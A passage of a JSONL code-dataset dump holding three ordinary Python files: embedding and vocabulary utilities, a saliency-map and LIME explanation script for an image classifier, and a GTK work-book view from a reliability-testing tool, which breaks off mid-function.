+{"seq_id":"51419839","text":"from itertools import islice\nfrom typing import Dict, List, Tuple\n\nimport numpy as np\n\n\ndef node_iterator(root):\n    \"\"\"\n    Enumerate UAST nodes using depth-first approach.\n    \"\"\"\n    queue = [(root, 0)]\n    n_nodes = 1\n    while queue:\n        node, node_idx = queue.pop()\n        yield node, node_idx\n        for child in node.children:\n            queue.append((child, n_nodes))\n            n_nodes += 1\n\n\ndef read_embeddings(emb_path: str) -> Tuple[Dict[str, np.array], List[str]]:\n    emb = {}\n    roles = []\n\n    with open(emb_path) as fin:\n        for line in fin:\n            word, *vec = line.split(\"\\t\")\n            emb[word] = np.array(vec, dtype=float)\n            if word.startswith(\"RoleId_\"):\n                roles.append(word)\n\n    roles = {role: i for i, role in enumerate(roles)}\n    return emb, roles\n\n\ndef read_paths(fname: str) -> List[str]:\n    with open(fname) as fin:\n        
paths = [line.strip() for line in fin.readlines()]\n if not paths:\n raise ValueError(\"Make sure the file is not empty!\")\n return paths\n\n\ndef read_vocab(vocab_path: str, num_words: int=None) -> List[str]:\n with open(vocab_path) as fin:\n words = [line.split(\" \")[0] for line in islice(fin, num_words)]\n return words\n\n\ndef save_vocab(vocab_path: str, vocab: Dict[str, int]) -> None:\n with open(vocab_path, \"w\") as fout:\n fout.write(\"\\n\".join(map(lambda x: \"%s %d\" % x, vocab.most_common())))\n","sub_path":"role2vec/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"543306397","text":"import sys\nimport os\nimport numpy as np\nimport torch\nimport matplotlib.pyplot as plt\nimport Model\nfrom lime import lime_image\nimport skimage.color as color\nfrom skimage.segmentation import slic\nREPORT_MODE = False#True\ndef parse_csv(label_path):\n raw_data_fp = open(label_path,'r')\n lines = raw_data_fp.readlines()[1:]\n num_data = len(lines)\n\n raw_imgs = np.empty(shape=(num_data,1,48*48), dtype=float)\n raw_y = np.zeros(shape=(num_data),dtype=np.int64)\n for i, line in enumerate(lines):\n nums = line.split(',')\n raw_y[i] = int(nums[0])\n raw_imgs[i,:,:] = np.array([float(num) for num in nums[1].split(' ')]) /255.0\n raw_imgs = raw_imgs.reshape((num_data,1,48,48))\n \n return raw_imgs, raw_y\n\ndef show_saliency_maps(x, y, model):\n x_org = x.squeeze().numpy()\n # Compute saliency maps for images in X\n saliency = compute_saliency_maps(x, y, model)\n\n # Convert the saliency map from Torch Tensor to numpy array and show images\n # and saliency maps together.\n saliency = saliency.detach().cpu().numpy()\n \n num_pics = x_org.shape[0]\n \n for i in range(num_pics):\n # You need to save as the correct fig names\n #plt.imsave('p3/pic_L'+str(int(y[i]))+'_i'+ str(i+offset)+'.png', x_org[i], cmap=plt.cm.gray)\n #plt.imsave('p3/pic_L'+str(int(y[i]))+'_i'+ str(i+offset)+'s.png', saliency[i], cmap=plt.cm.jet)\n if REPORT_MODE:\n plt.suptitle('Original / Saliency Map / Mask')\n ax = plt.subplot(1, 3, 1)\n plt.imshow(x_org[i], cmap=plt.cm.gray)\n plt.axis('off')\n \n ax = plt.subplot(1, 3, 2)\n im = plt.imshow(saliency[i], cmap=plt.cm.jet)\n plt.axis('off')\n #plt.axis('off')\n ax = plt.subplot(1, 3, 3)\n e_max = np.amax(saliency[i])\n e_min = np.amin(saliency[i])\n thres = (e_max-e_min) / 6\n img3 = x_org[i] * (saliency[i] > thres) + (saliency[i] <= thres) * 0.1\n plt.axis('off')\n plt.imshow(img3, cmap=plt.cm.gray)\n #cax = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n plt.savefig('rep/test'+str(i)+'.jpg')\n plt.close()\n else:\n im = plt.imshow(saliency[i], cmap=plt.cm.jet)\n plt.colorbar(im)\n\n plt.savefig(os.path.join(sys.argv[2], 'fig1_'+str(i)+'.jpg'))\n plt.close()\n\ndef compute_saliency_maps(x, y, model):\n model.eval()\n x.requires_grad_()\n y_pred = model(x.cuda())\n loss_func = torch.nn.CrossEntropyLoss()\n loss = loss_func(y_pred, y.cuda())\n loss.backward()\n\n saliency = x.grad.abs().squeeze().data\n return saliency\ndef explain(instance, predict_fn, **kwargs):\n np.random.seed(16)\n return exp.explain_instance(instance, predict_fn, **kwargs)\n\ndef predict(img):\n img = color.rgb2gray(img)\n img = img.reshape(img.shape[0], 1, 48, 48)\n t_img = torch.tensor(img).type(torch.FloatTensor).cuda()\n return model(t_img).detach().cpu().numpy()\n\ndef segmentation(img):\n return slic(img)\n\ndef gray2rgb(imgs):\n numData = imgs.shape[0]\n tmp = 
imgs.reshape(numData, 48,48)\n return color.gray2rgb(tmp)\n\ndef classify(imgs, label):\n img_list = [[] for i in range(7)]\n y_list = [[] for i in range(7)]\n for i in range(len(imgs)):\n y_list[label[i]].append(label[i])\n img_list[label[i]].append(imgs[i])\n num_pick = min([len(i) for i in img_list])\n num_pick = min(num_pick, 10)\n print('num_pick: ',num_pick)\n img = np.array(np.array(img_list[0][0:num_pick]) )\n lab = np.array(np.array(y_list[0][0:num_pick]) )\n for i in range(1, 7):\n img = np.concatenate((img, np.array(img_list[i][0:num_pick])), axis=0)\n lab = np.concatenate((lab, np.array(y_list[i][0:num_pick])), axis=0)\n return img, lab\n\nif __name__ == \"__main__\":\n try:\n imgs = np.load('imgs.npy')\n label = np.load('label.npy')\n except:\n imgs, label = parse_csv(sys.argv[1])\n np.save('imgs.npy', imgs)\n np.save('label.npy', label)\n try:\n imgs = np.load('cimgs.npy')\n label = np.load('clabel.npy')\n except:\n imgs, label = classify(imgs, label)\n np.save('cimgs.npy', imgs)\n np.save('clabel.npy', label)\n \n imgs_tensor = torch.tensor(imgs).type(torch.FloatTensor)\n label_tensor = torch.tensor(label).type(torch.LongTensor)\n model = Model.MyCNN()\n model.load_state_dict(torch.load('model_params0.6896.pkl'))\n model.cuda()\n model.eval()\n print(label_tensor)\n s_imgs = np.concatenate((imgs[2:3],imgs[12:13],imgs[22:23],imgs[37:38]\\\n ,imgs[45:46],imgs[52:53],imgs[65:66]), axis=0)\n s_imgs_tensor = torch.tensor(s_imgs).type(torch.FloatTensor)\n s_label_tensor = torch.tensor(np.arange(7)).type(torch.LongTensor)\n show_saliency_maps(s_imgs_tensor, s_label_tensor, model)\n \n # Lime needs RGB images\n \n lime_imgs = np.concatenate((imgs[5:6],imgs[18:19],imgs[23:24],imgs[30:31]\\\n ,imgs[41:42],imgs[52:53],imgs[60:61]), axis=0)\n \n x_train_rgb = gray2rgb(lime_imgs)\n # Initiate explainer instance\n \n explainer = lime_image.LimeImageExplainer()\n for idx in range(len(x_train_rgb)):\n # Get the explaination of an image\n np.random.seed(16)\n explaination = explainer.explain_instance(image=x_train_rgb[idx], \n classifier_fn=predict,segmentation_fn=segmentation)\n\n # Get processed image\n label = np.arange(7)\n image, mask = explaination.get_image_and_mask(label=label[idx],positive_only=False,\n hide_rest=False,num_features=5,min_weight=0.0)\n # save the image\n plt.imsave(os.path.join(sys.argv[2], 'fig3_'+str(idx)+'.jpg') ,image)","sub_path":"hw4/explainAI.py","file_name":"explainAI.py","file_ext":"py","file_size_in_byte":5772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"83570902","text":"#!/usr/bin/env python\r\n\"\"\"\r\n##############################\r\nTesting Package Work Book View\r\n##############################\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n#\r\n# rtk.testing.WorkBook.py is part of The RTK Project\r\n#\r\n# All rights reserved.\r\n\r\nimport sys\r\n\r\n# Import modules for localization support.\r\nimport gettext\r\nimport locale\r\n\r\n# Modules required for the GUI.\r\ntry:\r\n import pygtk\r\n pygtk.require('2.0')\r\nexcept ImportError:\r\n sys.exit(1)\r\ntry:\r\n import gtk\r\nexcept ImportError:\r\n sys.exit(1)\r\ntry:\r\n import gtk.glade\r\nexcept ImportError:\r\n sys.exit(1)\r\n\r\n# Import other RTK modules.\r\ntry:\r\n import Configuration\r\n import gui.gtk.Widgets as Widgets\r\nexcept ImportError:\r\n import rtk.Configuration as Configuration\r\n import rtk.gui.gtk.Widgets as Widgets\r\n# from Assistants import AddTesting\r\nimport __gui.gtk.Growth as gGrowth\r\n\r\n__author__ = 
'Andrew Rowland'\r\n__email__ = 'andrew.rowland@reliaqual.com'\r\n__organization__ = 'ReliaQual Associates, LLC'\r\n__copyright__ = 'Copyright 2007 - 2015 Andrew \"Weibullguy\" Rowland'\r\n\r\ntry:\r\n locale.setlocale(locale.LC_ALL, Configuration.LOCALE)\r\nexcept locale.Error:\r\n locale.setlocale(locale.LC_ALL, '')\r\n\r\n_ = gettext.gettext\r\n\r\n\r\nclass WorkView(gtk.VBox): # pylint: disable=R0902, R0904\r\n \"\"\"\r\n The Work Book view displays all the attributes for the selected\r\n Testing item. The attributes of a Work Book view are:\r\n\r\n :ivar _workview: the RTK top level Work View window to embed the\r\n Testing Work Book into.\r\n :ivar _testing_model: the Testing data model whose attributes are being\r\n displayed.\r\n :ivar dict _dic_definitions: dictionary containing pointers to the failure\r\n definitions for the Revision being displayed.\r\n Key is the Failure Definition ID; value is the\r\n pointer to the Failure Definition data model.\r\n :ivar list _lst_handler_id: list containing the ID's of the callback\r\n signals for each gtk.Widget() associated with\r\n an editable Testing attribute.\r\n\r\n +----------+-------------------------------------------+\r\n | Position | Widget - Signal |\r\n +==========+===========================================+\r\n | 0 | txtName `focus_out_event` |\r\n +----------+-------------------------------------------+\r\n | 1 | txtPartNum `focus_out_event` |\r\n +----------+-------------------------------------------+\r\n | 2 | txtAltPartNum `focus_out_event` |\r\n +----------+-------------------------------------------+\r\n | 3 | cmbCategory `changed` |\r\n +----------+-------------------------------------------+\r\n | 4 | cmbSubcategory `changed` |\r\n +----------+-------------------------------------------+\r\n | 5 | txtRefDes `focus_out_event` |\r\n +----------+-------------------------------------------+\r\n | 6 | txtCompRefDes `focus_out_event` |\r\n +----------+-------------------------------------------+\r\n | 7 | txtQuantity `focus_out_event` |\r\n +----------+-------------------------------------------+\r\n | 8 | txtDescription `focus_out_event` |\r\n +----------+-------------------------------------------+\r\n | 9 | cmbManufacturer `changed` |\r\n +----------+-------------------------------------------+\r\n | 10 | txtCAGECode `focus_out_event` |\r\n +----------+-------------------------------------------+\r\n | 11 | txtLCN `focus_out_event` |\r\n +----------+-------------------------------------------+\r\n | 12 | txtNSN `focus_out_event` |\r\n +----------+-------------------------------------------+\r\n | 13 | txtYearMade `focus_out_event` |\r\n +----------+-------------------------------------------+\r\n | 14 | txtSpecification `focus_out_event` |\r\n +----------+-------------------------------------------+\r\n | 15 | txtPageNum `focus_out_event` |\r\n +----------+-------------------------------------------+\r\n | 16 | txtFigNum `focus_out_event` |\r\n +----------+-------------------------------------------+\r\n | 17 | txtAttachments `focus_out_event` |\r\n +----------+-------------------------------------------+\r\n | 18 | txtMissionTime `focus_out_event` |\r\n +----------+-------------------------------------------+\r\n | 19 | chkRepairable `toggled` |\r\n +----------+-------------------------------------------+\r\n | 20 | chkTagged `toggled` |\r\n +----------+-------------------------------------------+\r\n | 21 | txtRemarks `focus_out_event` |\r\n +----------+-------------------------------------------+\r\n\r\n :ivar 
dtcTesting: the :class:`rtk.testing.Testing.Testing` data\r\n controller to use with this Work Book.\r\n\r\n :ivar chkSafetyCritical: the :class:`gtk.CheckButton` to display/edit the\r\n Testing's safety criticality.\r\n\r\n :ivar txtName: the :class:`gtk.Entry` to display/edit the Testing name.\r\n :ivar txtTotalCost: the :class:`gtk.Entry` to display the Testing cost.\r\n :ivar txtPartCount: the :class:`gtk.Entry` to display the number of\r\n Components comprising the Assembly.\r\n :ivar txtRemarks: the :class:`gtk.Entry` to display/edit the Testing\r\n remarks.\r\n :ivar txtPredictedHt: the :class:`gtk.Entry` to display the Testing\r\n logistics hazard rate.\r\n :ivar txtMissionHt: the :class:`gtk.Entry` to display the Testing mission\r\n hazard rate.\r\n :ivar txtMTBF: the :class:`gtk.Entry` to display the Testing logistics\r\n MTBF.\r\n :ivar txtMissionMTBF: the :class:`gtk.Entry` to display the Testing\r\n mission MTBF.\r\n :ivar txtMPMT: the :class:`gtk.Entry` to display the Testing mean\r\n preventive maintenance time.\r\n :ivar txtMCMT: the :class:`gtk.Entry` to display the Testing mean\r\n corrective maintenance time.\r\n :ivar txtMTTR: the :class:`gtk.Entry` to display the Testing mean time to\r\n repair.\r\n :ivar txtMMT: the :class:`gtk.Entry` to display the Testing mean\r\n maintenance time.\r\n :ivar txtAvailability: the :class:`gtk.Entry` to display the Testing\r\n logistics availability.\r\n :ivar txtMissionAt: the :class:`gtk.Entry` to display the Testing mission\r\n availability.\r\n \"\"\"\r\n\r\n def __init__(self, modulebook):\r\n \"\"\"\r\n Method to initialize the Work Book view for the Testing package.\r\n\r\n :param modulebook: the :py:class:`rtk.testing.ModuleBook` to associate\r\n with this Work Book.\r\n \"\"\"\r\n\r\n gtk.VBox.__init__(self)\r\n\r\n # Define private dictionary attributes.\r\n\r\n # Define private list attributes.\r\n self._lst_handler_id = []\r\n\r\n # Define private scalar attributes.\r\n self._modulebook = modulebook\r\n self._mdcRTK = modulebook.mdcRTK\r\n self._testing_model = None\r\n self._obj_planning = None\r\n self._obj_feasibility = None\r\n self._obj_assessment = None\r\n\r\n # Define public dictionary attributes.\r\n\r\n # Define public list attributes.\r\n\r\n # Define public scalar attributes.\r\n\r\n # General Data page widgets.\r\n self.cmbTestType = Widgets.make_combo(simple=True)\r\n\r\n self.spnConfidence = gtk.SpinButton()\r\n self.spnConsumerRisk = gtk.SpinButton()\r\n self.spnProducerRisk = gtk.SpinButton()\r\n\r\n self.txtName = Widgets.make_entry(width=400)\r\n self.txtAttachment = Widgets.make_text_view(width=400)\r\n self.txtDescription = Widgets.make_text_view(width=400)\r\n self.txtCumTime = Widgets.make_entry(width=100, editable=False,\r\n bold=True)\r\n self.txtCumFails = Widgets.make_entry(width=100, editable=False,\r\n bold=True)\r\n\r\n # Configure the gtk.SpinButtons.\r\n _adjustment = gtk.Adjustment(75.0, 50.0, 100.0, 0.5, 0, 0)\r\n self.spnConfidence.set_adjustment(_adjustment)\r\n self.spnConfidence.set_digits(int(Configuration.PLACES))\r\n\r\n self.spnConsumerRisk.set_digits(int(Configuration.PLACES))\r\n self.spnConsumerRisk.set_increments(0.1, 1.0)\r\n self.spnConsumerRisk.set_range(0.0, 100.0)\r\n\r\n self.spnProducerRisk.set_digits(int(Configuration.PLACES))\r\n self.spnProducerRisk.set_increments(0.1, 1.0)\r\n self.spnProducerRisk.set_range(0.0, 100.0)\r\n\r\n # Set gtk.Widget() tooltip text.\r\n self.cmbTestType.set_tooltip_text(_(u\"Select the type of the \"\r\n u\"of the selected test.\"))\r\n 
self.spnConfidence.set_tooltip_text(_(u\"Sets the statistical \"\r\n                                              u\"confidence for results \"\r\n                                              u\"obtained from the selected \"\r\n                                              u\"test.\"))\r\n        self.spnConsumerRisk.set_tooltip_text(_(u\"The consumer (Type I) \"\r\n                                                u\"risk. This is the risk of \"\r\n                                                u\"accepting a system when the \"\r\n                                                u\"true reliability is below \"\r\n                                                u\"the technical requirement.\"))\r\n        self.spnProducerRisk.set_tooltip_text(_(u\"The producer (Type II) \"\r\n                                                u\"risk. This is the risk of \"\r\n                                                u\"rejecting a system when the \"\r\n                                                u\"true reliability is at \"\r\n                                                u\"least the goal \"\r\n                                                u\"reliability.\"))\r\n        self.txtAttachment.set_tooltip_text(_(u\"Enter the URL to any \"\r\n                                              u\"attachment associated with \"\r\n                                              u\"the selected test.\"))\r\n        self.txtCumFails.set_tooltip_text(_(u\"Displays the cumulative number \"\r\n                                            u\"of failures for the selected \"\r\n                                            u\"test.\"))\r\n        self.txtCumTime.set_tooltip_text(_(u\"Displays the cumulative test \"\r\n                                           u\"time for the selected test.\"))\r\n        self.txtDescription.set_tooltip_text(_(u\"Enter a description of \"\r\n                                               u\"the selected test.\"))\r\n        self.txtName.set_tooltip_text(_(u\"Enter the name of the selected \"\r\n                                        u\"test.\"))\r\n\r\n        # Connect gtk.Widget() signals to callback methods.\r\n        _textview = self.txtDescription.get_child().get_child()\r\n        self._lst_handler_id.append(\r\n            _textview.connect('focus-out-event', self._on_focus_out, 0))\r\n        self._lst_handler_id.append(\r\n            self.txtName.connect('focus-out-event', self._on_focus_out, 1))\r\n        self._lst_handler_id.append(\r\n            self.txtAttachment.connect('focus-out-event',\r\n                                       self._on_focus_out, 2))\r\n\r\n        self._lst_handler_id.append(\r\n            self.cmbTestType.connect('changed', self._on_combo_changed, 3))\r\n        self._lst_handler_id.append(\r\n            self.spnConfidence.connect('value-changed',\r\n                                       self._on_value_changed, 4))\r\n        self._lst_handler_id.append(\r\n            self.spnConsumerRisk.connect('value-changed',\r\n                                         self._on_value_changed, 5))\r\n        self._lst_handler_id.append(\r\n            self.spnProducerRisk.connect('value-changed',\r\n                                         self._on_value_changed, 6))\r\n\r\n        # Put it all together.\r\n        _toolbar = self._create_toolbar()\r\n        self.pack_start(_toolbar, expand=False)\r\n\r\n        _notebook = self._create_notebook()\r\n        self.pack_end(_notebook)\r\n\r\n        self.show_all()\r\n\r\n    def _create_toolbar(self):\r\n        \"\"\"\r\n        Method to create the toolbar for the Testing class Work Book.\r\n\r\n        :return: _toolbar\r\n        :rtype: gtk.Toolbar\r\n        \"\"\"\r\n\r\n        _toolbar = gtk.Toolbar()\r\n\r\n        _position = 0\r\n\r\n        # Add test button.\r\n        _button = gtk.ToolButton()\r\n        _button.set_tooltip_text(_(u\"Adds a new test.\"))\r\n        _image = gtk.Image()\r\n        _image.set_from_file(Configuration.ICON_DIR + '32x32/add.png')\r\n        _button.set_icon_widget(_image)\r\n        _button.connect('clicked', self._on_button_clicked, 0)\r\n        _toolbar.insert(_button, 0)\r\n        _position += 1\r\n\r\n        # Delete test button\r\n        _button = gtk.ToolButton()\r\n        _button.set_tooltip_text(_(u\"Removes the currently selected test \"\r\n                                   u\"from the RTK Program Database.\"))\r\n        _image = gtk.Image()\r\n        _image.set_from_file(Configuration.ICON_DIR + '32x32/remove.png')\r\n        _button.set_icon_widget(_image)\r\n        _button.connect('clicked', self._on_button_clicked, 1)\r\n        _toolbar.insert(_button, _position)\r\n        _position += 1\r\n\r\n        _toolbar.insert(gtk.SeparatorToolItem(), _position)\r\n        _position += 1\r\n\r\n        # Save all tests button\r\n        _button = gtk.ToolButton()\r\n        _image = gtk.Image()\r\n        _image.set_from_file(Configuration.ICON_DIR + '32x32/save.png')\r\n        _button.set_icon_widget(_image)\r\n        
_button.connect('clicked', self._on_button_clicked, 2)\r\n _toolbar.insert(_button, _position)\r\n _position += 1\r\n\r\n _toolbar.insert(gtk.SeparatorToolItem(), _position)\r\n\r\n _toolbar.show()\r\n\r\n return _toolbar\r\n\r\n def _create_notebook(self):\r\n \"\"\"\r\n Method to create the Testing class gtk.Notebook().\r\n\r\n :return: _notebook\r\n :rtype: gtk.Notebook\r\n \"\"\"\r\n\r\n _notebook = gtk.Notebook()\r\n\r\n # Set the user's preferred gtk.Notebook() tab position.\r\n if Configuration.TABPOS[2] == 'left':\r\n _notebook.set_tab_pos(gtk.POS_LEFT)\r\n elif Configuration.TABPOS[2] == 'right':\r\n _notebook.set_tab_pos(gtk.POS_RIGHT)\r\n elif Configuration.TABPOS[2] == 'top':\r\n _notebook.set_tab_pos(gtk.POS_TOP)\r\n else:\r\n _notebook.set_tab_pos(gtk.POS_BOTTOM)\r\n\r\n self._create_general_data_page(_notebook)\r\n\r\n return _notebook\r\n\r\n def _create_general_data_page(self, notebook):\r\n \"\"\"\r\n Method to create the Testing class gtk.Notebook() page for\r\n displaying general data about the selected Testing.\r\n\r\n :param gtk.Notebook notebook: the Testing class gtk.Notebook() widget.\r\n :return: False if successful or True if an error is encountered.\r\n :rtype: boolean\r\n \"\"\"\r\n\r\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\r\n # Build-up the containers for the tab. #\r\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\r\n _fixed = gtk.Fixed()\r\n\r\n _scrollwindow = gtk.ScrolledWindow()\r\n _scrollwindow.set_policy(gtk.POLICY_AUTOMATIC,\r\n gtk.POLICY_AUTOMATIC)\r\n _scrollwindow.add_with_viewport(_fixed)\r\n\r\n _frame = Widgets.make_frame(label=_(u\"General Information\"))\r\n _frame.set_shadow_type(gtk.SHADOW_ETCHED_OUT)\r\n _frame.add(_scrollwindow)\r\n\r\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\r\n # Place the widgets used to display general information. 
#\r\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\r\n # Load the gtk.ComboBox()\r\n _test_types = [_(u\"HALT/HASS\"), _(u\"ALT\"), _(u\"ESS\"),\r\n _(u\"Reliability Growth\"),\r\n _(u\"Reliability Demonstration\"), _(u\"PRAT\")]\r\n _model = self.cmbTestType.get_model()\r\n _model.clear()\r\n self.cmbTestType.append_text(\"\")\r\n for __, _types in enumerate(_test_types):\r\n self.cmbTestType.append_text(_types)\r\n\r\n # Create the labels.\r\n _labels = [_(u\"Test Name:\"), _(u\"Test Description:\"),\r\n _(u\"Test Type:\"), _(u\"Confidence:\"), _(u\"Consumer's Risk:\"),\r\n _(u\"Producer's Risk:\"), _(u\"Cumulative Time:\"),\r\n _(u\"Cumulative Failures:\"), _(u\"Attachments:\")]\r\n\r\n (_x_pos, _y_pos) = Widgets.make_labels(_labels[:2], _fixed, 5, 5)\r\n (_x_pos1, _y_pos1) = Widgets.make_labels(_labels[2:], _fixed, 5,\r\n _y_pos[1] + 105)\r\n _x_pos = max(_x_pos, _x_pos1) + 25\r\n\r\n # Place the widgets.\r\n _fixed.put(self.txtName, _x_pos, _y_pos[0])\r\n _fixed.put(self.txtDescription, _x_pos, _y_pos[1])\r\n _fixed.put(self.cmbTestType, _x_pos, _y_pos1[0])\r\n _fixed.put(self.spnConfidence, _x_pos, _y_pos1[1])\r\n _fixed.put(self.spnConsumerRisk, _x_pos, _y_pos1[2])\r\n _fixed.put(self.spnProducerRisk, _x_pos, _y_pos1[3])\r\n _fixed.put(self.txtCumTime, _x_pos, _y_pos1[4])\r\n _fixed.put(self.txtCumFails, _x_pos, _y_pos1[5])\r\n _fixed.put(self.txtAttachment, _x_pos, _y_pos1[6])\r\n\r\n _fixed.show_all()\r\n\r\n # Insert the tab.\r\n _label = gtk.Label()\r\n _label.set_markup(\"\" +\r\n _(u\"General\\nData\") +\r\n \"\")\r\n _label.set_alignment(xalign=0.5, yalign=0.5)\r\n _label.set_justify(gtk.JUSTIFY_CENTER)\r\n _label.show_all()\r\n _label.set_tooltip_text(_(u\"Displays general information about \"\r\n u\"the selected test.\"))\r\n notebook.insert_page(_frame, tab_label=_label, position=-1)\r\n\r\n return False\r\n\r\n def _load_planning_inputs_page(self): # pylint: disable=R0914, R0915\r\n \"\"\"\r\n Method to create and load the Testing class gtk.Notebook() page for\r\n displaying the test planning inputs for the selected Test.\r\n\r\n :param gtk.Notebook notebook: the Testing class gtk.Notebook() widget.\r\n :return: False if successful or True if an error is encountered.\r\n :rtype: boolean\r\n \"\"\"\r\n\r\n _notebook = self.get_children()[1]\r\n\r\n self._obj_planning = gGrowth.Planning(self._mdcRTK.dtcGrowth,\r\n self._modulebook.listbook)\r\n self._obj_planning.create_page()\r\n self._obj_planning.load_page(self._testing_model)\r\n self._obj_planning.show_all()\r\n\r\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\r\n # Build-up the containers for the tab. 
#\r\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\r\n _label = gtk.Label()\r\n _label.set_markup(\"\" +\r\n _(u\"Test\\nPlanning\\nInputs\") + \"\")\r\n _label.set_alignment(xalign=0.5, yalign=0.5)\r\n _label.set_justify(gtk.JUSTIFY_CENTER)\r\n _label.show_all()\r\n _label.set_tooltip_text(_(u\"Allows entering test planning inputs for \"\r\n u\"the selected test.\"))\r\n\r\n _notebook.insert_page(self._obj_planning, tab_label=_label,\r\n position=-1)\r\n\r\n return False\r\n\r\n def _load_feasibility_page(self): # pylint: disable=R0914, R0915\r\n \"\"\"\r\n Method to create and load the Testing class gtk.Notebook() page for\r\n displaying the test feasibility assessment for the selected Test.\r\n\r\n :param gtk.Notebook notebook: the Testing class gtk.Notebook() widget.\r\n :return: False if successful or True if an error is encountered.\r\n :rtype: boolean\r\n \"\"\"\r\n\r\n _notebook = self.get_children()[1]\r\n\r\n self._obj_feasibility = gGrowth.Feasibility(self._mdcRTK.dtcGrowth,\r\n self._modulebook.listbook)\r\n self._obj_feasibility.create_page()\r\n self._obj_feasibility.load_page(self._testing_model)\r\n self._obj_feasibility.show_all()\r\n\r\n _label = gtk.Label()\r\n _label.set_markup(\"\" +\r\n _(u\"Test\\nFeasibility\") + \"\")\r\n _label.set_alignment(xalign=0.5, yalign=0.5)\r\n _label.set_justify(gtk.JUSTIFY_CENTER)\r\n _label.show_all()\r\n _label.set_tooltip_text(_(u\"Displays the feasibility criteria for the \"\r\n u\"selected test.\"))\r\n\r\n _notebook.insert_page(self._obj_feasibility, tab_label=_label,\r\n position=-1)\r\n\r\n return False\r\n\r\n def _load_assessment_page(self): # pylint: disable=R0914, R0915\r\n \"\"\"\r\n Method to create and load the Test Assessment gtk.Notebook() page for\r\n displaying the test results for the selected Test.\r\n\r\n :return: False if successful or True if an error is encountered.\r\n :rtype: bool\r\n \"\"\"\r\n\r\n _notebook = self.get_children()[1]\r\n\r\n self._obj_assessment = gGrowth.Assessment(self._mdcRTK.dtcGrowth,\r\n self._modulebook.listbook)\r\n self._obj_assessment.create_page()\r\n self._obj_assessment.load_page(self._testing_model)\r\n self._obj_assessment.show_all()\r\n\r\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\r\n # Build-up the containers for the tab. #\r\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\r\n _label = gtk.Label()\r\n _label.set_markup(\"\" +\r\n _(u\"Test\\nResults\") + \"\")\r\n _label.set_alignment(xalign=0.5, yalign=0.5)\r\n _label.set_justify(gtk.JUSTIFY_CENTER)\r\n _label.show_all()\r\n _label.set_tooltip_text(_(u\"Displays the test results for the \"\r\n u\"selected test.\"))\r\n\r\n _notebook.insert_page(self._obj_assessment, tab_label=_label,\r\n position=-1)\r\n\r\n return False\r\n\r\n def load(self, model):\r\n \"\"\"\r\n Method to load the Testing class gtk.Notebook().\r\n\r\n :param model: the :py:class:`rtk.testing.Testing.Model` to load.\r\n :return: False if successful or True if an error is encountered.\r\n :rtype: boolean\r\n \"\"\"\r\n\r\n self._testing_model = model\r\n\r\n fmt = '{0:0.' + str(Configuration.PLACES) + 'g}'\r\n\r\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\r\n # Load the General Data information. 
#\r\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\r\n self.cmbTestType.set_active(model.test_type)\r\n self.spnConfidence.set_value(float(model.confidence * 100.0))\r\n self.spnConsumerRisk.set_value(float(model.consumer_risk))\r\n self.spnProducerRisk.set_value(float(model.producer_risk))\r\n self.txtName.set_text(str(model.name))\r\n _textview = self.txtAttachment.get_children()[0].get_children()[0].get_buffer()\r\n _textview.set_text(model.attachment)\r\n _textview = self.txtDescription.get_children()[0].get_children()[0].get_buffer()\r\n _textview.set_text(model.description)\r\n self.txtCumTime.set_text(str(fmt.format(model.cum_time)))\r\n self.txtCumFails.set_text(str(fmt.format(model.cum_failures)))\r\n\r\n _notebook = self.get_children()[1]\r\n for _page in range(_notebook.get_n_pages() - 1):\r\n _notebook.remove_page(-1)\r\n\r\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\r\n # Load the Planning Data information. #\r\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\r\n self._load_planning_inputs_page()\r\n\r\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\r\n # Load the Feasibility Data information. #\r\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\r\n self._load_feasibility_page()\r\n\r\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\r\n # Load the Assessment Data information. #\r\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\r\n self._load_assessment_page()\r\n\r\n _notebook.set_current_page(0)\r\n\r\n return False\r\n\r\n def _request_add_testing(self, test_type, model, parent, testing_id):\r\n \"\"\"\r\n Method to call the Testing data controller function 'add_test' and\r\n then update the Testing Work Book gtk.TreeView() with the newly added\r\n test.\r\n\r\n :param int test_type: the type of Testing item to add.\r\n * 1 = HALT/HASS\r\n * 2 = ALT\r\n * 3 = ESS\r\n * 4 = Reliability Growth\r\n * 5 = Reliability Demonstration\r\n * 6 = PRAT\r\n :param gtk.TreeModel model: the gtk.TreeModel() displaying the Testing\r\n hierarchy.\r\n :param gtk.TreeIter parent: the gtk.TreeIter() that will be the parent\r\n of the newly added testing item.\r\n :param int testing_id: the testing ID of the parent Testing module.\r\n :return: False if successful or True if an error is encountered.\r\n :rtype: bool\r\n \"\"\"\r\n\r\n # Add the new testing item to the database and dtcTesting dictionary.\r\n (_testing, _error_code) = self._mdcRTK.dtcTesting.add_testing(\r\n self._testing_model.revision_id, test_type, testing_id)\r\n\r\n if test_type == 1:\r\n _icon = Configuration.ICON_DIR + '32x32/halthass.png'\r\n elif test_type == 2:\r\n _icon = Configuration.ICON_DIR + '32x32/accelerated.png'\r\n elif test_type == 3:\r\n _icon = Configuration.ICON_DIR + '32x32/ess.png'\r\n elif test_type == 4:\r\n _icon = Configuration.ICON_DIR + '32x32/growth.png'\r\n elif test_type == 5:\r\n _icon = Configuration.ICON_DIR + '32x32/demonstration.png'\r\n elif test_type == 